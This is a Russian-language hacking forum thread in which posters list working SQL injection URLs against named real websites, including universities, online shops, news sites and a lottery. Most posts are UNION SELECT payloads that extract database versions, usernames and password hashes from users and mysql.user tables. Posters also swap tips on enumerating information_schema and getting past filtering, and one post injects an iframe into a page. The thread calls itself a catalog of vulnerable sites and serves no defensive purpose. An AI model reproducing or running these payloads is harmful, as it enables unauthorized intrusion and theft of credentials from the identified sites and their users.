SQL Инъекции

Code:

http://www.metafysiko.gr/interviews.php?id=-20+union+select+1,version(),3/*

Code:

http://www.paokworld.com/outputofarticle.php?ID=-373+union+select+1,2,user(),4,5,6,7,8,9,10/*

Code:

http://www.rwf.gr/episode1-new.php?id=81%20UNION%20SELECT%201,AES_DECRYPT(AES_ENCRYPT(version(),0x71),0x71),3,4,5,6,7,8+limit+1,1/*

Code:

http://www.uip.edu/fr/colloques.php?id=-9%20UNION%20SELECT%201,user(),3,4,5,6,7,8/*

 

www.mediaprovinces.kz

Code:

http://www.mediaprovinces.kz/index.php?r=-1+union+select+username,2+from+phpbb_users/*

Еще одна перед сном =)

Вроде стандартные названия колонок не подходят =(

Code:

http://www.fitness.ru/news/shownews.phtml?id=-1+union+select+1,version(),3,4,5,6,7,8,9,10,11,12,13+from+users/*

 

_http://www.hw.net.ua/photoart.php?id='+union+select+1,2,table_name,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4+from+information_schema.tables+limit+16,1/*

 

Code:

http://www.infonew.ru/show.php?cid=-1+union+select+concat(login,0x3a,password)+from+users+limit+0,1/*

=\

 

www.0577.ru

Лотерея, довольно неплохие призы, много областей, версия 5, но там походу фильтрация при переборе колонок идет. Кто докопается вышлите мне КПК =)

Code:

http://www.0577.ru/index.php?region_id=-1+union+select+version()+from+mysql.user/*

 

www.weight-watchers.ee

 

avtostarter.com

Можно прикупить запчасти =)
На акках довльно крупные скидки 20%+

Code:

http://avtostarter.com//obzor.php?k_id=-1+union+select+concat(login,char(58),pass)+from+users+limit+3,1/*

 

чето не понятно о какой фильтрации идет речь
http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA.COLUMNS+limit+17,100/*

 

=\

 

Code:

http://www.sibdom.ru/help.php?ids=-1+union+select+1,2,concat(user_name,0x3a,user_pass),4,5,6,7+from+users/*

Code:

http://www.riag.ru/index.php?ids=-1+union+select+1,2,version(),4,5,6,7+from+users/*

Code:

http://nskfei.ru/girl.php?ids=-1+union+select+1,user(),3,version(),5,6,7,database()/*

Code:

http://www.zol.ru/review/show.php?ids%5B0%5D=-1+union+select+1,2,3,4,5,user(),7,8,9,10,11+user/*

Code:

http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*

Code:

http://sochinki.ru/girl.php?ids=-1+union+select+1,user(),3,4,5,6,7,8/*

 

2Spyder

это не перебор колонок?http://www.0577.ru/index.php?region_id=-1+union+select+COLUMN_NAME+FROM+INFORMATION_SCHEMA .COLUMNS+limit+17,100/*

upd:
Spyder вроде статью написал а такие простые вещи не знаешь
http://www.0577.ru/index.php?region_id=-1+union+select+AES_DECRYPT(AES_ENCRYPT(concat(user_name,char(58),user_password),0x71),0x71)+from+anum_new.auth_user+limit+0,1/*

 

Spyder ее не надо подбирать
TABLE_SCHEMA+FROM+INFORMATION_SCHEMA.TABLES+WHERE+TABLE_NAME='тут название таблицы'/* выводит в какой базе находиться таблица.
извиняюсь за оффтоп

 

судя по версии сервак на винде =\

 

Code:

http://www.uca.edu/maptour/index.php?id=-6+union+select+1,2,3,4,password,6+from+mysql.user/*

http://www.flirtanica.ru

Code:

http://www.flirtanica.ru./articles1.php?id=-1+union+select+1,version(),3,4,5/*

http://www.gelezo.net

Code:

http://www.gelezo.net/files.php?id=1'+union+select+1,2,3,4,5,version(),7,8,10,11,12,13/*

Кстати, мы всем этим сайтам повышаем популярность, это как каталог бажных сайтов =)

 

Code:

http://www.chita.ru/firms/index.php?page=view&id=-1+union+select+1,2,3,4,5,convert(concat(database(),char(58),user(),char(58),version()),char),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/*

Code:

http://www.foodpages.ru/show_firm.php?id_firm=-1+union+select+1,2,3,4,5,6,7,8,9,10,concat(database(),char(58),user(),char(58),version()),12,13/*

Code:

http://vdd.com.ua/Tovaru.php?idr=-1+union+select+concat(database(),char(58),user(),char(58),version())/*

 

Code:

http://www.michaelpollan.com/article.php?id=80%20UNION%20SELECT%201,user(),3,4,5,6,7,8,9,10+limit+1,1/*

Code:

http://www.spectrum.am/eng/articles.php?id=-60'+union+select+1,2,version()/*

Code:

http://www.forumweekly.am/index.php?id=-18+union+select+1,2,user(),4,5,6/*

Code:

http://www.xgroup.am/news.php?id=-17+union+select+1,2,3,4,version(),6,7/*

www.footballshop.am

Code:

http://www.footballshop.am/shop.php?id=-89+union+select+1,concat(name,0x3a,pwd)+from+user/*
http://www.footballshop.am/shop.php?id=-89+union+select+1,table_name+from+INFORMATION_SCHEMA.TABLES/*

Code:

http://design.barsmedia.am/news.php?id=-13+union+select+1,2,table_name,4,5,6,7,8+from+INFORMATION_SCHEMA.TABLES/*
http://design.barsmedia.am/news.php?id=-13+union+select+1,2,user(),4,5,6,7,8+from+users/*

 

Code:

http://www.switch.ch/de/about/news-archive.html?id=-120+union+select+1,2,3,4,5,6/*

Одна из идеальных скулей...

Code:

http://www.wattstopper.com/newsroom/news.html?id=-56+union+select+concat_ws(char(58),user,password),2,3,4+from+mysql.user/*

С таблицам неприятность =\

Code:

http://www.cop-morrien.de/news.html?id=-19+union+select+1,2,3,4,5,version(),database(),8,9,10,11,12/*

Code:

http://www.net-zone.ru/news.html?id=1+union+select+concat_ws(char(58),user,password),2,concat(version(),char(58),user(),char(58),database()),4+from+mysql.user/*

P.s concat_ws оказался достаточно полезной фичей, имхо)

 

www.nsu.ru

Новосибирский Государственный Университет

Code:

http://www.nsu.ru/dynamic/news/news_view.php?news_mode=single&news_user=user&news_action=view&news_id=-1+union+select+version(),2,3,4,5,6,7,8/*

 

http://www.pizzamarketplace.com/article.php?id=-1+union+select+version(),2,3,4,5,6,7,8/*

 

Даже Алёна рекомендует )

http://www.tonnel.ru/index.php?l=cal'+union+select+1,'%3Ciframe%20src=http://antichat.ru%3E%3C/iframe%3E',3,4,5,6,7+from+forum/*